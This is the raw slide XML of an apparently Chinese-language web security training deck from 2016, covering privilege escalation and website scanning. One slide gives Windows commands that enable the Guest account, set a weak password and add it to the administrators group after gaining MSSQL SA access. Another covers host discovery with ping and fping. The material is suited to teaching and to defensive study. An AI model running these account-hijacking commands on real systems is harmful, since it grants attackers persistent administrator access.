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ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="685800"/>
            <a:ext cx="4572000" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Shape 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6999"/>
      </a:lnSpc>
      <a:defRPr sz="2200">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl1pPr>
    <a:lvl2pPr indent="228600" defTabSz="457200" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="116999"/>
      </a:lnSpc>
      <a:defRPr sz="2200">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl2pPr>
    <a:lvl3pPr indent="457200" defTabSz="457200" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="116999"/>
      </a:lnSpc>
      <a:defRPr sz="2200">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl3pPr>
    <a:lvl4pPr indent="685800" defTabSz="457200" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="116999"/>
      </a:lnSpc>
      <a:defRPr sz="2200">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl4pPr>
    <a:lvl5pPr indent="914400" defTabSz="457200" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="116999"/>
      </a:lnSpc>
      <a:defRPr sz="2200">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl5pPr>
    <a:lvl6pPr indent="1143000" defTabSz="457200" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="116999"/>
      </a:lnSpc>
      <a:defRPr sz="2200">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl6pPr>
    <a:lvl7pPr indent="1371600" defTabSz="457200" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="116999"/>
      </a:lnSpc>
      <a:defRPr sz="2200">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl7pPr>
    <a:lvl8pPr indent="1600200" defTabSz="457200" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="116999"/>
      </a:lnSpc>
      <a:defRPr sz="2200">
        <a:latin typeface="+mn-lt"/>
        <a:ea typeface="+mn-ea"/>
        <a:cs typeface="+mn-cs"/>
        <a:sym typeface="Helvetica Neue"/>
      </a:defRPr>
    </a:lvl8pPr>
    <a:lvl9pPr indent="1828800" defTabSz="457200" latinLnBrk="0">
      <a:lnSpc>
        <a:spcPct val="116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a:r>
              <a:t>Title Text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 1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xfrm>
            <a:off x="9046500" y="8905523"/>
            <a:ext cx="273608"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9046500" y="8905523"/>
            <a:ext cx="273608" cy="269239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="45718" tIns="45718" rIns="45718" bIns="45718" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="r">
              <a:defRPr sz="1200">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13335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7780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22225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6670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31242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35814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40386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4495800" marR="0" indent="-8890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1pPr>
      <a:lvl2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2pPr>
      <a:lvl3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3pPr>
      <a:lvl4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4pPr>
      <a:lvl5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5pPr>
      <a:lvl6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6pPr>
      <a:lvl7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7pPr>
      <a:lvl8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8pPr>
      <a:lvl9pPr marL="0" marR="0" indent="0" algn="r" defTabSz="584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xxx.com/article.php?id=123"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192.168.166.208:808"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sysorem/PHP-Hash-Collision-POC" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.tif"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.tif"/></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4.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 name="Shape 31"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1269998" y="1638300"/>
            <a:ext cx="10464804" cy="3302000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>Web安全攻防</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Shape 32"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1125537" y="5362575"/>
            <a:ext cx="10464801" cy="1130300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="2" marL="0" indent="457200" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3200"/>
            </a:pPr>
            <a:r>
              <a:t>－2016年7月15日</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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513406" y="669924"/>
            <a:ext cx="140999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4.提权</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Shape 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669180" y="1887536"/>
            <a:ext cx="910605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因为MSSQL有SA权限，基本想干么就干么…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Shape 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3498594" y="2644774"/>
            <a:ext cx="60076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扫了下开放了RDP服务(3389)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="image4.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5993605" y="8215311"/>
            <a:ext cx="1017589" cy="350839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Shape 75"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="653896" y="3306761"/>
            <a:ext cx="1169700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登录的时候发现Administrator用户要密码，于是乎CMD....</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Shape 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2749244" y="4081461"/>
            <a:ext cx="819211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（开启Guest账户并提升到管理员权限）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Shape 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2353100" y="5810250"/>
            <a:ext cx="9276500"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latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>net user Guest active:yes       //激活Guest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2900">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>net user Guest 12345      //设密码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2900">
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>net localgroup administrators Guest //add 提升管理员组</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1"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8"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72"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:se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73"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="73"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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75"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="75"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="76"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="76"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="77"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:se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 presetID="2" grpId="7" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="42" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="74"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:se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 grpId="7"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="76" grpId="5"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="72" grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="73" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="75" grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="71" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="77" grpId="6"/>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 name="image6.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1536700" y="2032000"/>
            <a:ext cx="10502900" cy="7429500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80" name="image4.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5885655" y="36512"/>
            <a:ext cx="1017589" cy="350839"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Shape 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="450055" y="1089024"/>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登录服务器</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1"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="10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79"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="800" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="79"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="800" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 grpId="2"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="81"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p>
            <a:pPr/>
            <a:r>
              <a:t>网站安全扫描技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Shape 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="722311" y="2899567"/>
            <a:ext cx="12128603" cy="2552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概述：</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扫描可以获取关于网站雇员、承包商、以及信息系统的信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>，并了解组织内物理及逻辑信息系统的结构。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Shape 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715961" y="5187950"/>
            <a:ext cx="12585803" cy="3822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目标：</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确定连接到组织目标网络中的计算机和其他设备的指定信息。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>寻找可用的主机，确定节点的种类（笔记本，服务器，网络</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>设备等），操作系统，提供的公共服务，甚至还有可以发现</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:latin typeface="Helvetica Light"/>
                <a:ea typeface="Helvetica Light"/>
                <a:cs typeface="Helvetica Light"/>
                <a:sym typeface="Helvetica Light"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>的漏洞。</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nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736599" y="801686"/>
            <a:ext cx="537255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PING/fping: 主机存活测试</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Shape 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1700212" y="1573211"/>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存活</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Shape 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1692275" y="5489573"/>
            <a:ext cx="14859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不存活</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="90" name="image7.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1943100" y="2667000"/>
            <a:ext cx="9639300" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="91" name="pasted-image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1936750" y="6305548"/>
            <a:ext cx="8509000" cy="276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7"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="87"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="10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88"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="10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90"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="600" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="90"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="600" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="90"/>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4" fill="hold">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="el" backwards="0">
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="89"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="wipe(left)" transition="in">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="10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91"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="600" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="91"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="600" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 grpId="4"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="90" grpId="3"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="87" grpId="1"/>
      <p:bldP build="whole" bldLvl="1" animBg="1" rev="0" advAuto="0" spid="91" grpId="5"/>
